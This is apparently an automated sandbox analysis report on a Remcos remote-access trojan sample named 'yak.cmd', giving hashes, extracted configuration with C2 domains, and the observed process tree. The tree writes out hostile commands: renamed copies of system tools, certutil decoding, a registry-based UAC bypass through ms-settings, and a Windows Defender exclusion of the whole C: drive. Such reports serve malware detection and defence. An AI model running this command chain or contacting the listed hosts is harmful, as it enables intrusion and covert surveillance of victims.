Analysis

  • max time kernel
    147s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    16-05-2024 15:09

General

  • Target

    yak.cmd

  • Size

    3.2MB

  • MD5

    f09fcd4720339bb3092fe8b0e0c9f631

  • SHA1

    56afd26c5a724a87ce8d3648213a6ff2adcc10a9

  • SHA256

    ef227a4256686de1fd81f9494ad29f25c698ba837c1781014537374cc333f022

  • SHA512

    6304df118b808c2334248c14184cfad98a0ccb3931cb7876c718f328af5093c65c8b71e10ae73fc8b8dd8868ffe73c4e6ca1e2f327cb85cf5c385accc6aadcdd

  • SSDEEP

    24576:rSyi8cqIjNCrvFt5YjM8JfKlt/6azwC2ig407jFudT1omd4pig5j+RCNJXCP+pp:rSyTn2g51/6Zigt74omdu3p

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

myumysmeetr.ddns.net:2404

mysweeterbk.ddns.net:2404

meetre1ms.freeddns.org:2404

bbhmeetre1ms.freeddns.org:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TPT9X3

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 18 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 5 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\yak.cmd"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      2⤵
        PID:616
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        2⤵
        • Executes dropped EXE
        PID:2756
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        2⤵
        • Executes dropped EXE
        PID:2368
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\system32\extrac32.exe
          extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:2224
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\yak.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2684
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\yak.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
            3⤵
            • Executes dropped EXE
            PID:2712
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            3⤵
              PID:3004
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2540
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              3⤵
                PID:2452
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2616
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                3⤵
                  PID:2704
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2584
                • C:\Users\Public\xkn.exe
                  C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2176
                  • C:\Users\Public\alpha.exe
                    "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2908
                    • C:\Users\Public\ger.exe
                      C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                      5⤵
                      • Executes dropped EXE
                      • Modifies registry class
                      PID:2132
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:332
                • C:\Users\Public\kn.exe
                  C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
                  3⤵
                  • Executes dropped EXE
                  PID:1992
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2404
                • C:\Windows\system32\taskkill.exe
                  taskkill /F /IM SystemSettings.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2656
              • C:\Users\Public\Libraries\Ping_c.pif
                C:\Users\Public\Libraries\Ping_c.pif
                2⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious behavior: EnumeratesProcesses
                PID:1592
                • C:\Windows\SysWOW64\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Duchpovs.PIF
                  3⤵
                    PID:2512
                  • C:\Windows\SysWOW64\SndVol.exe
                    C:\Windows\System32\SndVol.exe
                    3⤵
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:2068
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                  2⤵
                  • Executes dropped EXE
                  PID:2140
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                  2⤵
                  • Executes dropped EXE
                  PID:1996
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                  2⤵
                  • Executes dropped EXE
                  PID:2152
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:356
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:320
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:108
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:1504
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:2792

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\remcos\logs.dat

                Filesize

                222B

                MD5

                c815760333cd37a90a51fda4b8105c04

                SHA1

                7f1131d2628493e00d5918aac2890c6cd84060b0

                SHA256

                a3012567131467698347321f3d74a4e9cc8a2a0357effb891e058b5cb9611243

                SHA512

                d1c9a3a551494171c60ada66075fd95baf4def572061696dddd6037a40a2e7cfa547687e7f86c03a8871fb66d4e05c1a36e9e410f93026b089d04ea5a25bd710

              • C:\Users\Public\Libraries\Ping_c.pif

                Filesize

                1.1MB

                MD5

                33bbd27a00b4160a844a7edf2efef84e

                SHA1

                c3f19d22898b690d4c98c59416c62ec6e54a39de

                SHA256

                2c49f89d2a461bb32f9c50f8b37fb53b0f86294d4f03fb3e08588e979329fb45

                SHA512

                d4628cdae15273dc0863afa06153d202d8a61ed8d0f9e213c47f029016b81cad7d2d4dc3c115aefbff9c9d0ba6d74e3aa89f09d5fd6226eaa597f0e0328415b7

              • C:\Users\Public\Ping_c.mp4

                Filesize

                2.2MB

                MD5

                4ea05e6097590a5d2eac1ba0ada0a2fa

                SHA1

                63bb037ad57358d6931cccbc8a37c6bdeddcb497

                SHA256

                8457b155358dd52b872245248bb8e3dfaa275cae2537e35520514b0a81833320

                SHA512

                9103b62fbbba7e3b6304d50f6409bae14be2e4791d2d22b5b0d8181a269c686a56d8c269b48e194d414883e433965d91f22caa5035f0a539bfb441fa301d1a84

              • C:\Users\Public\kn.exe

                Filesize

                1.1MB

                MD5

                ec1fd3050dbc40ec7e87ab99c7ca0b03

                SHA1

                ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

                SHA256

                1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

                SHA512

                4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

              • \Users\Public\alpha.exe

                Filesize

                337KB

                MD5

                5746bd7e255dd6a8afa06f7c42c1ba41

                SHA1

                0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

                SHA256

                db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

                SHA512

                3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

              • \Users\Public\ger.exe

                Filesize

                73KB

                MD5

                9d0b3066fe3d1fd345e86bc7bcced9e4

                SHA1

                e05984a6671fcfecbc465e613d72d42bda35fd90

                SHA256

                4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

                SHA512

                d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

              • \Users\Public\xkn.exe

                Filesize

                462KB

                MD5

                852d67a27e454bd389fa7f02a8cbe23f

                SHA1

                5330fedad485e0e4c23b2abe1075a1f984fde9fc

                SHA256

                a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

                SHA512

                327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

              • memory/1592-76-0x0000000000400000-0x000000000051D000-memory.dmp

                Filesize

                1.1MB

              • memory/2068-87-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-90-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-115-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-84-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-82-0x00000000026B0000-0x00000000036B0000-memory.dmp

                Filesize

                16.0MB

              • memory/2068-89-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-91-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-88-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-92-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-99-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-98-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-114-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2068-106-0x00000000155A0000-0x0000000015622000-memory.dmp

                Filesize

                520KB

              • memory/2176-43-0x000000001B410000-0x000000001B6F2000-memory.dmp

                Filesize

                2.9MB

              • memory/2176-44-0x0000000001D30000-0x0000000001D38000-memory.dmp

                Filesize

                32KB